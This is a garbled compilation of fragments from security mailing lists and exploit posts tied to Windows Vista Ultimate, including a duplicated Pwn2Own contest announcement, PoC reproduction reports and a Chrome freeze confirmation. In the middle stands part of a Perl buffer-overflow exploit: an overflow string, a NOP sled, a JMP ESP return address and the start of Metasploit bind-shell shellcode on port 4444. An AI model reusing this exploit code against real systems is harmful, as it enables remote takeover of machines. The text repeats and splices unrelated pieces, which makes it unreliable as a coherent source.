claim the prize.
Targets (typical road-warrior clients):
VAIO VGN-TZ37CN running Ubuntu 7.10
Fujitsu U810 running Vista Ultimate SP1
MacBook Air running OSX 10.5.2
This year's contest will begin on March 26th, and go during the
presentation hours and breaks of the conference until March 28th.
The main purpose of this contest is to present new vulnerabilities in
claim the prize.
Targets (typical road-warrior clients):
VAIO VGN-TZ37CN running Ubuntu 7.10
Fujitsu U810 running Vista Ultimate SP1
MacBook Air running OSX 10.5.2
This year's contest will begin on March 26th, and go during the
presentation hours and breaks of the conference until March 28th.
The main purpose of this contest is to present new vulnerabilities in
Unable to reproduce on Vista Ultimate x64-all patch levels.
John Menerick
www.securesql.info
On Sep 8, 2009, at 11:35 AM, Tim Medin wrote:
> Creating multiple RDP connection at the same time causes Windows to
> Blue Screen. Here is the Proof of Concept code.
print "[+] Exploiting.....\n" ;
my $buff="http://"."\x41" x 969 ;
my $nop ="\x90" x 6000 ;
my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows
Vista Ultimate English
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
-----------------------------
Using the sample program it was possible to verify this issue on following operating systems and configurations:
* Microsoft Windows Vista Enterprise 32 bit & 64 bit
* Microsoft Windows Vista Ultimate 32 bit & 64 bit
It is very likely that other versions of Windows Vista are affected by this issue.
This issue did not occur on Windows XP.
I can confirm that the PoC indeed freezes Chrome 0.2.149.29 (looks like inf loop, not responding to anything, the whole browser, not a renderer only) on Microsoft Windows Vista Ultimate SP1.
I can also confirm that the PoC DOES NOT freeze Chrome on Microsoft Windows XP Pro SP2.
Is it system dependent ?
